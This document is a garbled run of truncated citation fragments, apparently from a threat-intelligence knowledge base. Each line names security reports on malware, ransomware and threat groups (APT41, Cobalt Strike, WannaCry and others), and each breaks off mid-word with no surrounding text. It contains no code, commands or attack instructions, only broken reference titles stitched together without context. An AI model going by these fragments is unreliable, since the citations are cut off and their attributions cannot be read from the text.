2),(Citation: Dell Dridex Oct 2015),(Citation: Mandiant Cutting Edge Part 2 January 2024),(Citation: RedCanary Mockingbird May 2020),(Cita

on: ESET InvisiMole June 2018),(Citation: University of Birmingham C2)

(Citation: ESET GreyEnergy Oct 2018),
on: TrendMicro BKDR_URSNIF.SM),(Citation: Mandiant Suspected Turla Campaign February 2023),(Citation: Joint Cybersecurity Advisory A

018),(Citation: Bitdefender Trickbot March 2020),(Citation: DFIR Conti Bazar Nov 2021),(Citation: group-ib_muddywater_infra),(Citation: P
Ransomware Targeting Healthcare October 2020),(Citation: cobaltstrike manual),(Citation: Fidelis njRAT June 2013),(Citation: CrowdStrike
GTR2020 Mar 2020),(Citation: FoxIT Wocao December 2019),(Citation: Kaspersky ToddyCat Check Logs October 2023),(Citation: MDSec B

UETTE May 2023),(Citation: SecureWorks WannaCry Analysis),(Citation: Mandiant FIN12 Oct 2021),(Citation: Alperovitch 2014),(Citation:
tation: TechNet Removable Media Control)

A SoreFang July 2016),(Citation: Latrodectus APR 2024),(Citation: ANSSI RYUK RANSOMWARE),(Citation: FireEye APT41 Aug 2019),(Citatio

mcos Jan 2018),(Citation: Cylance Dust Storm),(Citation: FireEye APT41 Aug 2019),(Citation: Kaspersky WIRTE November 2021),(Citation: CI
Brute Force Campaign July 2021),(Citation: Mandiant Cutting Edge Part 2 January 2024),(Citation: Lee 2013),(Citation: CISA Supernova Jan

2020),(Citation: IBM MegaCortex),(Citation: Trend Micro Cheerscrypt May 2022),(Citation: Sophos BlackCat Jul 2022),(Citation: Securewor

otCroissant April 2020),(Citation: FOX-IT May 2016 Mofang),(Citation: Rewterz Sidewinder APT April 2020),(Citation: Cobalt Strike Manual
2020),(Citation: SCILabs Malteiro 2021),(Citation: ATT TeamTNT Chimaera September 2020),(Citation: Talos Frankenstein June 2019),(Citati

r December 2018),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: Forcepoint BITTER Pakistan Oct 2016),

Mon May 2020),(Citation: Volexity Patchwork June 2018),(Citation: ThreatConnect Kimsuky September 2020),(Citation: US-CERT BLINDING
21),(Citation: Unit 42 TA551 Jan 2021),(Citation: ESET T3 Threat Report 2021),(Citation: Microsoft WDAC)

Derusbi Converge),(Citation: ESET Hermetic Wizard March 2022),(Citation: KISA Operation Muzabi),(Citation: Malwarebytes Kimsuky June 2
tation: TrendMicro Pikabot 2024),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Talos Nyetya June 2017),(Citation: Lotus Blossom Ju

),(Citation: ESET Zebrocy Nov 2018),(Citation: Secureworks GandCrab and REvil September 2019),(Citation: Mandiant FIN12 Oct 2021),(Cit

aka 2022),(Citation: Proofpoint Leviathan Oct 2017),(Citation: Volexity PowerDuke November 2016),(Citation: Kaspersky Transparent Tribe

on Cobalt Kitty 2017),(Citation: ATT TeamTNT Chimaera September 2020),(Citation: GovCERT Carbon May 2016),(Citation: Mandiant Opera
t Diavol July 2021),(Citation: FireEye Operation Double Tap),(Citation: Carbon Black HotCroissant April 2020),(Citation: Mandiant FIN7 Apr

Jan 2010),(Citation: Bitdefender Naikon April 2021),(Citation: GitHub PoshC2),(Citation: TrendMicro EarthLusca 2022),(Citation: Talos Grav

FoxIT Wocao December 2019),(Citation: DFIR Ryuk in 5 Hours October 2020),(Citation: Palo Alto Networks BBSRAT),(Citation: cobaltstrike m

ate Dec 2020),(Citation: Prevailion DarkWatchman 2021),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Secureworks BR

0),(Citation: GitHub Pupy),(Citation: Cyberreason Anchor December 2019),(Citation: Invincea XTunnel),(Citation: F-Secure BlackEnergy 201
ust 2019),(Citation: Trend Micro TA505 June 2019),(Citation: Visa FIN6 Feb 2019),(Citation: Proofpoint Leviathan Oct 2017),(Citation: DFIR_

0 Phishing March 2024),(Citation: Talos Transparent Tribe May 2021),(Citation: Trend Micro Qakbot May 2020),(Citation: ESET Machete Ju
ecember 2019),(Citation: Symantec W32.Duqu),(Citation: Microsoft NICKEL December 2021),(Citation: Gigamon Berserk Bear October 2021

RE),(Citation: Unit42 Agrius 2023),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: Crowdstrike Indrik Novem

ky Transparent Tribe August 2020),(Citation: Uptycs Warzone UAC Bypass November 2020),(Citation: PaloAlto NanoCore Feb 2016),(Citatio

n Nov 2015),(Citation: ClearSky Lazarus Aug 2020),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Talos Smoke Loader July
lOne Agrius 2021),(Citation: Sophos Gootloader),(Citation: Unit42 BendyBear Feb 2021),(Citation: MSTIC NOBELIUM Mar 2021),(Citation:

Citation: FireEye Shining A Light on DARKSIDE May 2021),(Citation: Unit 42 WhisperGate January 2022),(Citation: Cisco Talos Intelligence G
fpoint Leviathan Oct 2017),(Citation: CISA ComRAT Oct 2020),(Citation: PaloAlto Patchwork Mar 2018),(Citation: Talos Kimsuky Nov 2021),

011),(Citation: Cybereason INC Ransomware November 2023),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Microsoft V
),(Citation: Nccgroup Emissary Panda May 2018),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: MalwareBytes LazyScripter

),(Citation: DFIR_Quantum_Ransomware),(Citation: Symantec Buckeye),(Citation: GitHub PoshC2),(Citation: Rostovcev APT41 2021),(Citati

tion: Sekoia Raccoon2 2022),(Citation: Symantec Daggerfly 2023),(Citation: CrowdStrike BloodHound April 2018),(Citation: Kaspersky Turla

sca 2022),(Citation: DOJ Iran Indictments March 2018),(Citation: KISA Operation Muzabi),(Citation: BlackBerry CostaRicto November 2020
0),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: Palo Alto DNS Requests),(Citation: Unit 42 QUAD

ation: Volexity OceanLotus Nov 2017),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: Talos PoetRAT October 2020),(Citation: Malwar
o Feb 2020),(Citation: ESET InvisiMole June 2018),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Securelist Remexi Jan 201
ctment Jul 2018),(Citation: KISA Operation Muzabi),(Citation: FireEye FELIXROOT July 2018),(Citation: ESET Sednit Part 2),(Citation: Secure
eworkPOS September 2019),(Citation: FireEye HAWKBALL Jun 2019),(Citation: Palo Alto T9000 Feb 2016),(Citation: Nicolas Falliere, Liam O

ant Suspected Turla Campaign February 2023),(Citation: Kaspersky ToddyCat Check Logs October 2023),(Citation: Secureworks BRONZE BU
kComet March 2018),(Citation: f-secure janicab),(Citation: Cylance Machete Mar 2017),(Citation: ESET InvisiMole June 2020),(Citation: Obj
July 2018),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: GitHub Pacu),(Citation: Unit 42 VERMIN Jan 2018),(Cit

oint TA2541 February 2022),(Citation: Group IB RTM August 2019),(Citation: Anomali Evasive Maneuvers July 2015),(Citation: Symantec D
May 2016),(Citation: objsee mac malware 2017),(Citation: Volexity InkySquid RokRAT August 2021),(Citation: Riskiq Remcos Jan 2018),(Cita

eb 2018),(Citation: Volexity InkySquid RokRAT August 2021),(Citation: NCC Group Fivehands June 2021),(Citation: FireEye Hacking Team),(C

),(Citation: Trend Micro Black Basta October 2022),(Citation: FRP GitHub),(Citation: Elastic Latrodectus May 2024),(Citation: Medium Meta

MuddyWater TrendMicro June 2018),(Citation: Proofpoint TA2541 February 2022),(Citation: cobaltstrike manual),(Citation: Trend Micro TA
ober 2020),(Citation: Talos Cobalt Strike September 2020),(Citation: Securelist Machete Aug 2014),(Citation: GitHub Pupy),(Citation: ESET
n: Chaos Stolen Backdoor),(Citation: Scarlet Mimic Jan 2016),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation
2021),(Citation: Cybereason Oceanlotus May 2017),(Citation: Secureworks IRON TILDEN Profile),(Citation: Securelist MuddyWater Oct 201
Citation: Proofpoint TA505 Jan 2019),(Citation: Mandiant APT1),(Citation: Zscaler Higaisa 2020),(Citation: Deep Instinct TA505 Apr 2019),(C
tus Blossom Jun 2015),(Citation: Cybereason Cobalt Kitty 2017),(Citation: ATT TeamTNT Chimaera September 2020),(Citation: Cylance Clea
ctory Services Internals DPAPI Backup Keys Oct 2015),(Citation: SecureWorks August 2019),(Citation: Red Canary NETWIRE January 2020),(

M Grandoreiro April 2020),(Citation: Talos Olympic Destroyer 2018),(Citation: ESET EvasivePanda 2023),(Citation: Unit42 OilRig Playbook 2

uster),(Citation: Symantec Shamoon 2012),(Citation: McAfee GhostSecret),(Citation: Kaspersky StoneDrill 2017),(Citation: FireEye APT38 O

n: RotaJakiro 2021 netlab360 analysis),(Citation: Fortinet Emotet May 2017),(Citation: Mandiant Operation Ke3chang November 2014),(Ci
reworks GOLD IONIC April 2024),(Citation: SecureWorks WannaCry Analysis),(Citation: CERT-FR PYSA April 2020),(Citation: US District Cou

,(Citation: Kaspersky ToddyCat Check Logs October 2023),(Citation: Unit 42 Kazuar May 2017),(Citation: Prevailion DarkWatchman 2021),(

nt Jul 2018),(Citation: Mandiant FIN13 Aug 2022),(Citation: FOX-IT May 2016 Mofang),(Citation: Talos Kimsuky Nov 2021),(Citation: McAfe
s PoetRAT October 2020),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: CarbonBlack Conti July 2020),(Citation: MalwareBytes LazyS

One Aoqin Dragon June 2022),(Citation: FireEye FIN7 Oct 2019),(Citation: McAfee Sharpshooter December 2018),(Citation: Mandiant No Ea

tic Wiper March 2022),(Citation: Ready.gov IT DRP)

ntec Bumblebee June 2022),(Citation: DFIR Phosphorus November 2021),(Citation: Bitsight Latrodectus June 2024),(Citation: Elastic Pikabo

Lusca 2022),(Citation: Symantec Leafminer July 2018),(Citation: Symantec Tick Apr 2016),(Citation: TrendMicro New Andariel Tactics July 2

cureWorks WannaCry Analysis),(Citation: Github PowerShell Empire),(Citation: Leonardo Turla Penquin May 2020),(Citation: Joint Cyberse
ary 2020),(Citation: Unit42 BendyBear Feb 2021),(Citation: Mandiant No Easy Breach),(Citation: Latrodectus APR 2024),(Citation: Unit42 O
0),(Citation: Linux FTP),(Citation: TechNet Firewall Design)
2018),(Citation: ESET Industroyer),(Citation: Mandiant APT41),(Citation: NCC Group Chimera January 2021),(Citation: ESET Turla Lunar tool

antec Waterbug Jun 2019),(Citation: Secureworks GOLD SAHARA),(Citation: Checkpoint IndigoZebra July 2021),(Citation: Microsoft POLON

Citation: US District Court Indictment GRU Oct 2018),(Citation: FireEye Exchange Zero Days March 2021),(Citation: Microsoft NICKEL Decem
Citation: Symantec Tick Apr 2016),(Citation: Talos Bisonal Mar 2020),(Citation: TrendMicro Tonto Team October 2020),(Citation: PTSecurit

colas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: Symantec Whitefly March 2019),(Citation: Prevx Carberp March 2011),
ecember 2020),(Citation: Secure List Bad Rabbit),(Citation: FireEye WannaCry 2017),(Citation: SANS Conficker),(Citation: ESET InvisiMole J
July 2023),(Citation: Intezer Doki July 20),(Citation: US-CERT TA18-074A),(Citation: CISA AA24-038A PRC Critical Infrastructure February 20
),(Citation: Malwarebytes Kimsuky June 2021),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Cyberreason Anchor December 2019),(Ci
Kazuar May 2017),(Citation: Trend Micro Skidmap),(Citation: Arxiv Avaddon Feb 2021),(Citation: BlackBerry CostaRicto November 2020),(C
tion: ESET OceanLotus macOS April 2019),(Citation: SentinelOne Cuckoo Stealer May 2024),(Citation: Carbon Black Shlayer Feb 2019),(Citati

Unit 42 Magic Hound Feb 2017),(Citation: Emotet Deploys TrickBot),(Citation: Bitdefender Trickbot VNC module Whitepaper 2021),(Citati

),(Citation: ESET InvisiMole June 2018),(Citation: Crowdstrike HuntReport 2022),(Citation: Microsoft Sxstrace),(Citation: Powersploit),(Cita
ugX June 2017),(Citation: Bitdefender LuminousMoth July 2021),(Citation: Trend Micro DRBControl February 2020),(Citation: FireEye Metam
yShell March 2022),(Citation: Trend Micro njRAT 2018),(Citation: ESET InvisiMole June 2018),(Citation: Trend Micro Cyclops Blink March 20
ry 2021),(Citation: Cylance Cleaver),(Citation: Sogeti CERT ESEC Babuk March 2021),(Citation: ESET Ebury Oct 2017),(Citation: Sophos Maz

SUNBURST Backdoor December 2020),(Citation: GitHub SILENTTRINITY Modules July 2019),

eEye APT41 Aug 2019),(Citation: Unit42 Agrius 2023),(Citation: FireEye Hacking Team),(Citation: Symantec Trojan.Hydraq Jan 2010),(Citati
012),(Citation: Microsoft PLATINUM April 2016),(Citation: Kaspersky MoleRATs April 2019),(Citation: Security Intelligence More Eggs Aug 2

ke DNC June 2016),(Citation: Mandiant APT29 Eye Spy Email Nov 22),(Citation: Novetta Blockbuster),(Citation: ESET Sednit USBStealer 2014

Grandoreiro April 2020),(Citation: Mandiant FIN12 Oct 2021),(Citation: Microsoft Actinium February 2022),(Citation: ESET Gelsemium Jun
2022),(Citation: Hornet Security Avaddon June 2020),(Citation: Prevailion DarkWatchman 2021),(Citation: Cylance Sodinokibi July 2019),(C

y NETWIRE January 2020),(Citation: FireEye APT41 Aug 2019),(Citation: CISA EB Aug 2020),(Citation: Cylance Shaheen Nov 2018),(Citation:
actor),(Citation: Unit42 LockerGoga 2019),(Citation: Microsoft GALLIUM December 2019),(Citation: Symantec Waterbug Jun 2019),(Citatio

net 2023),(Citation: Mandiant FIN13 Aug 2022),(Citation: Cisco Talos Avos Jun 2022),(Citation: Secureworks DarkTortilla Aug 2022),(Citatio

n 2017),(Citation: ClearSky MuddyWater Nov 2018),(Citation: Lunghi Iron Tiger Linux),(Citation: SentinelOne WinterVivern 2023),(Citation:
dStrike Carbon Spider August 2021),(Citation: Cybereason Chaes Nov 2020),(Citation: Red Canary NETWIRE January 2020),(Citation: Talos T

on: Riskiq Remcos Jan 2018),(Citation: FireEye APT41 Aug 2019),(Citation: ESET Turla PowerShell May 2019),(Citation: Nicolas Falliere, Liam

2021),(Citation: Korean FSI TA505 2020),(Citation: Joe Sec Trickbot),(Citation: NCC Group WastedLocker June 2020),(Citation: Novetta Win

tiy CERT Ramsay April 2020),(Citation: SANS Conficker),(Citation: Dell TG-3390),(Citation: Bitdefender Naikon April 2021),(Citation: GitHub
ug 2021),(Citation: Mandiant Suspected Turla Campaign February 2023),(Citation: BitDefender Chafer May 2020),(Citation: FoxIT Wocao D

020),(Citation: Mandiant APT29 Eye Spy Email Nov 22),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: Cobalt Strike Manual 4.3 Nove
yRAT),(Citation: Novetta Blockbuster),(Citation: Lumen KVBotnet 2023),(Citation: Mandiant UNC3890 Aug 2022),(Citation: US-CERT HOPLI

tation: Unit42 OilRig Playbook 2023),(Citation: FireEye APT34 July 2019),(Citation: FireEye APT33 Guardrail),(Citation: Mandiant FIN12 Oct

3),(Citation: Cadet Blizzard emerges as novel threat actor),(Citation: NCC Group APT15 Alive and Strong),(Citation: Github Koadic),(Citation
: Infoblox Lokibot January 2019),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: Cisc
POWERSTATS V3 June 2019),(Citation: Group IB Ransomware September 2020),(Citation: CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY
(Citation: Cylance Machete Mar 2017),(Citation: Tetra Defense Sodinokibi March 2020),(Citation: BitDefender BADHATCH Mar 2021),(Cita

14),(Citation: Intezer HiddenWasp Map 2019),(Citation: Kaspersky MoleRATs April 2019),(Citation: Unit 42 QUADAGENT July 2018),(Citatio
September 2021),(Citation: Secureworks REvil September 2019),(Citation: Unit 42 Valak July 2020),(Citation: MSTIC NOBELIUM Mar 2021),

: Sogeti CERT ESEC Babuk March 2021),(Citation: Zscaler Bazar September 2020),(Citation: IBM TA505 April 2020),(Citation: Cyberint Qakb

untress INC Ransomware May 2024),(Citation: Mandiant APT41),(Citation: NCC Group Chimera January 2021),(Citation: Securelist Sofacy F

R Vol 19),(Citation: Proofpoint TA505 Mar 2018),(Citation: EFF Manul Aug 2016),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Sen
mber 2019),(Citation: CISA SoreFang July 2016),(Citation: SecureList Griffon May 2019),(Citation: CISA WellMess July 2020),(Citation: Bitsigh

9),(Citation: PWC Yellow Liderc 2023),(Citation: Malwarebytes Silent Librarian October 2020),(Citation: Phish Labs Silent Librarian),(Citation

(Citation: Securelist Kimsuky Sept 2013),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: FireEye APT30),(Citation: Cylance S
1),(Citation: Trend Micro Qakbot May 2020),(Citation: ESET Machete July 2019),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: SCILa

sing run-only applescripts 2021),(Citation: wardle evilquest parti),(Citation: Check Point Meteor Aug 2021),(Citation: Mandiant APT1),(Cita
lLabs Agent Tesla Aug 2020),(Citation: Cybereason Bumblebee August 2022),(Citation: Mandiant FIN12 Oct 2021),(Citation: Github PowerS

somware Targeting Healthcare October 2020),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Lazarus APT Janua

imsuky Nov 2021),(Citation: Cisco Operation Layover September 2021),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Tele

),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: ClearSky Pay2Kitten December 2020),(Citation: SentinelOne Aoqi
y Mockingbird May 2020),(Citation: Bitdefender Naikon April 2021),(Citation: FoxIT Wocao December 2019),(Citation: US-CERT BADCALL),(

oint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: Symantec Buckeye),(Citation: Prevailion DarkWatchman 202

muddywater_infra),(Citation: Proofpoint TA450 Phishing March 2024),(Citation: PTSecurity Cobalt Group Aug 2017),(Citation: Secureworks
e 2013),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Novetta Blockbuster RATs),(Citation: Novetta Blockbuster),(Citation: F
ober 2023),(Citation: MDSec Brute Ratel August 2022),(Citation: Symantec Buckeye),(Citation: Cybersecurity Advisory GRU Brute Force Cam

: Alperovitch 2014),(Citation: Crowdstrike Qakbot October 2020),(Citation: Kaspersky ToddyCat Check Logs October 2023),(Citation: Fideli

eEye APT41 Aug 2019),(Citation: McAfee Dianxun March 2021),(Citation: Unit 42 Valak July 2020),(Citation: Nicolas Falliere, Liam O Murchu

E November 2021),(Citation: CISA EB Aug 2020),(Citation: NCCGroup RokRat Nov 2018),(Citation: Cylance Shaheen Nov 2018),(Citation: Sec
(Citation: CISA Supernova Jan 2021),(Citation: Volexity OceanLotus Nov 2017),(Citation: Mandiant Cutting Edge January 2024),(Citation: M

Jul 2022),(Citation: Secureworks REvil September 2019),(Citation: FireEye WannaCry 2017),(Citation: Cybereason INC Ransomware Novem

Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Kaspersky Ferocious Kitten Jun 2021
Frankenstein June 2019),(Citation: ESET Casbaneiro Oct 2019),(Citation: BlackBerry Amadey 2020),(Citation: ATT QakBot April 2021),(Citati

int BITTER Pakistan Oct 2016),(Citation: Proofpoint TA416 Europe March 2022),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Fire

0),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: Lazarus APT January 2022),(Citation: Kaspersky LuminousMoth July 2021),(Citation
Malwarebytes Kimsuky June 2021),(Citation: Unit42 Xbash Sept 2018),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Unit 42 Valak July 2
17),(Citation: Lotus Blossom Jun 2015),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Arbor Musical Chairs Feb 2018),(Citation: ESET Te

Mandiant FIN12 Oct 2021),(Citation: ESET Gelsemium June 2021),(Citation: SentinelOne Valak June 2020),(Citation: Joint Cybersecurity Adv

n: Kaspersky Transparent Tribe August 2020),(Citation: Fortinet Diavol July 2021),(Citation: Carbon Black HotCroissant April 2020),(Citation

16),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: Secureworks BRONZE SILHOUETTE May 2023),(Citation: US Distric
,(Citation: Mandiant FIN7 Apr 2022),(Citation: Kaspersky Turla Aug 2014),(Citation: BiZone Lizar May 2021),(Citation: Korean FSI TA505 202

sca 2022),(Citation: Talos GravityRAT),(Citation: McAfee Babuk February 2021),(Citation: Carbon Black HotCroissant April 2020),(Citation: B

BSRAT),(Citation: cobaltstrike manual),(Citation: Savill 1999),(Citation: ESET Okrum July 2019),(Citation: GitHub PoshC2),(Citation: Symante

21),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Sekoia Raccoon2 2022),(Citation: Kaspersky ShadowPad Aug 2017),(Citati

tion: F-Secure BlackEnergy 2014),(Citation: Trend Micro TeamTNT),(Citation: Unit42 Azorult Nov 2018),(Citation: Kaspersky Adwind Feb 20
han Oct 2017),(Citation: DFIR_Quantum_Ransomware),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: Trend Micro Qakbo

20),(Citation: ESET Machete July 2019),(Citation: TrendMicro Pikabot 2024),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Cybereaso
mon Berserk Bear October 2021),(Citation: CISA AA21-200A APT40 July 2021),(Citation: Dell TG-3390),(Citation: Microsoft Star Blizzard Augu

tion: Crowdstrike Indrik November 2018),(Citation: Microsoft Volt Typhoon May 2023),(Citation: Bitdefender Naikon April 2021),(Citation: C

o NanoCore Feb 2016),(Citation: Imminent Unit42 Dec2019),(Citation: Securelist Machete Aug 2014),(Citation: 360 Machete Sep 2020),(Ci

ation: Talos Smoke Loader July 2018),(Citation: Unit 42 OilRig Sept 2018),(Citation: Talos GravityRAT),(Citation: Securelist APT10 March 202
OBELIUM Mar 2021),(Citation: SentinelLabs Metador Technical Appendix Sept 2022),(Citation: Cyphort EvilBunny Dec 2014),(Citation: ward

tion: Cisco Talos Intelligence Group),(Citation: Google EXOTIC LILY March 2022),(Citation: Proofpoint Bumblebee April 2022),(Citation: ESET
tion: Talos Kimsuky Nov 2021),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: Talos ROKRAT),(Citation: Google Election Threats

h 2022),(Citation: Microsoft Volt Typhoon May 2023),(Citation: FireEye FiveHands April 2021),(Citation: FireEye SUNBURST Backdoor Dece
on: MalwareBytes LazyScripter Feb 2021),(Citation: FinFisher Citation),(Citation: GitHub Pupy),(Citation: Fortinet Remcos Feb 2017),(Citatio

Rostovcev APT41 2021),(Citation: CISA Scattered Spider Advisory November 2023),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Cita

018),(Citation: Kaspersky Turla Aug 2014),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: Kaspersky Poseidon Gro

ry CostaRicto November 2020),(Citation: ESET Operation Spalax Jan 2021),(Citation: eSentire FIN7 July 2021),(Citation: CISA AA20-301A Kim
quests),(Citation: Unit 42 QUADAGENT July 2018),(Citation: cobaltstrike manual),(Citation: Zscaler Cobian Aug 2017),(Citation: CopyKittens

ctober 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: MalwareBytes WoodyRAT Aug 2022),(Citation: Symantec Remsec IO
tion: Securelist Remexi Jan 2019),
ednit Part 2),(Citation: Securelist Dtrack),(Citation: FOX-IT May 2016 Mofang),(Citation: Kaspersky Turla Aug 2014),(Citation: US-CERT TA18
ation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: Trend Micro FIN6 October 2019),(Citation: FireEye MESSAGETA

tion: Secureworks BRONZE BUTLER Oct 2017),(Citation: Symantec Tick Apr 2016),(Citation: Malwarebytes Kimsuky June 2021),(Citation: CI
Mole June 2020),(Citation: Objective-See MacMa Nov 2021),(Citation: ESET InvisiMole June 2018),
Unit 42 VERMIN Jan 2018),(Citation: GitHub PoshC2),(Citation: Sekoia Raccoon2 2022),(Citation: KISA Operation Muzabi),(Citation: DOJ GR

y 2015),(Citation: Symantec Dragonfly),(Citation: Trend Micro Qakbot December 2020),(Citation: Proofpoint Leviathan Oct 2017),(Citation
Riskiq Remcos Jan 2018),(Citation: Kaspersky Adwind Feb 2016),(Citation: Malwarebytes DarkComet March 2018),(Citation: Github Koadic

tion: FireEye Hacking Team),(Citation: FireEye APT39 Jan 2019),(Citation: NCC Group APT15 Alive and Strong),(Citation: FireEye APT34 Dec

2024),(Citation: Medium Metamorfo Apr 2020),(Citation: Cybereason Valak May 2020),(Citation: ESET WinterVivern 2023),(Citation: MacK

nual),(Citation: Trend Micro TA505 June 2019),(Citation: Visa FIN6 Feb 2019),(Citation: Proofpoint Leviathan Oct 2017),(Citation: CrowdStr
GitHub Pupy),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Unit 42 IronNetInjector February 2021 ),(Citation: synack 2016 revie
cture February 2024),(Citation: FireEye APT41 March 2020),(Citation: Medium Anchor DNS July 2020),(Citation: Red Canary NETWIRE Janu
ecurelist MuddyWater Oct 2018),(Citation: Cybereason Chaes Nov 2020),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Cylance Dust Storm
ep Instinct TA505 Apr 2019),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: ESET Turla Mosquito Jan 2018),(Citation: M
er 2020),(Citation: Cylance Cleaver),(Citation: Unit42 RDAT July 2020),(Citation: Symantec Briba May 2012),(Citation: US-CERT Bankshot De
nary NETWIRE January 2020),(Citation: Cybereason Kimsuky November 2020),(Citation: Infoblox Lokibot January 2019),(Citation: GitHub M

ation: Unit42 OilRig Playbook 2023),(Citation: FireEye APT34 July 2019),(Citation: FireEye APT33 Guardrail),(Citation: Deply Mimikatz),(Cita

17),(Citation: FireEye APT38 Oct 2018),(Citation: SentinelOne Agrius 2021),(Citation: Securelist BlackEnergy Feb 2015),(Citation: Unit42 Xb

Ke3chang November 2014),(Citation: Unit42 RDAT July 2020),(Citation: FireEye APT33 Guardrail),(Citation: Mandiant Suspected Turla Cam
020),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: LogRhythm WannaCry),(Citation: Trend Micro AvosLo

vailion DarkWatchman 2021),(Citation: BlackBerry CostaRicto November 2020),(Citation: Novetta Blockbuster),(Citation: Malwarebytes Kim

ky Nov 2021),(Citation: McAfee GhostSecret),(Citation: Korean FSI TA505 2020),(Citation: PowerSploit Documentation),(Citation: CrowdStr
(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: MalwareBytes WoodyRAT Aug 2022),(Citation: NCC Group Fivehands June 2021

018),(Citation: Mandiant No Easy Breach),(Citation: Microsoft NICKEL December 2021),(Citation: Crowdstrike Indrik November 2018),(Citati

2024),(Citation: Elastic Pikabot 2024),(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: Arctic Wolf Akira 2023),(Citation:

cro New Andariel Tactics July 2018),(Citation: SocGholish-update),(Citation: ESET LoudMiner June 2019),(Citation: Picus Sodinokibi January

2020),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: Blasco 2013),(Citation: Prevailion DarkWatc
APR 2024),(Citation: Unit42 OceanLotus 2017),(Citation: FireEye APT29),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 201
Citation: ESET Turla Lunar toolset May 2024),(Citation: Cybereason Soft Cell June 2019),(Citation: ESET Machete July 2019),(Citation: ZScale

1),(Citation: Microsoft POLONIUM June 2022),(Citation: Bitdefender LuminousMoth July 2021),

ation: Microsoft NICKEL December 2021),(Citation: Check Point APT35 CharmPower January 2022),(Citation: Talos Rocke August 2018),(Cit
ober 2020),(Citation: PTSecurity Higaisa 2020),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Talos Cobalt Strike Septembe

n: Prevx Carberp March 2011),(Citation: Group IB Ransomware September 2020),(Citation: Microsoft CVE-2021-1732 Feb 2021),(Citation: E
er),(Citation: ESET InvisiMole June 2020),(Citation: Symantec Cicada November 2020),(Citation: US-CERT NotPetya 2017),(Citation: Ars Tec
tical Infrastructure February 2024),(Citation: Intezer TeamTNT September 2020),(Citation: mandiant_apt44_unearthing_sandworm),(Citati
n Anchor December 2019),(Citation: Talos TinyTurla September 2021),(Citation: Check Point APT34 April 2021),(Citation: Unit 42 Valak Jul
CostaRicto November 2020),(Citation: CarbonBlack Conti July 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: MalwareByte
Black Shlayer Feb 2019),(Citation: NCSC-NL COATHANGER Feb 2024),(Citation: alientvault macspy),(Citation: MSTIC Nobelium Toolset May

dule Whitepaper 2021),(Citation: FireEye APT29),(Citation: PWC Yellow Liderc 2023),(Citation: FireEye APT34 Dec 2017),(Citation: Check P

e),(Citation: Powersploit),(Citation: Microsoft More information about DLL),(Citation: Microsoft Dynamic Link Library Search Order)
2020),(Citation: FireEye Metamorfo Apr 2018),(Citation: ESET OceanLotus Mar 2019),(Citation: Palo Alto Brute Ratel July 2022),(Citation: P
Micro Cyclops Blink March 2022),
t 2017),(Citation: Sophos Maze VM September 2020),(Citation: Mandiant FIN12 Oct 2021),(Citation: CERT-FR PYSA April 2020),(Citation: M

rojan.Hydraq Jan 2010),(Citation: Gh0stRAT ATT March 2019),(Citation: Check Point Meteor Aug 2021),(Citation: Crowdstrike HuntReport
y Intelligence More Eggs Aug 2019),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Symantec Dragonfly),(Citation: Trustwave Cherry P

n: ESET Sednit USBStealer 2014),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: McAfee GhostSecret),(Citation: ESET Ocean

(Citation: ESET Gelsemium June 2021),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: Unit 42 Kazu
ylance Sodinokibi July 2019),(Citation: Arxiv Avaddon Feb 2021),(Citation: ESET Hermetic Wizard March 2022),(Citation: Picus Sodinokibi Ja

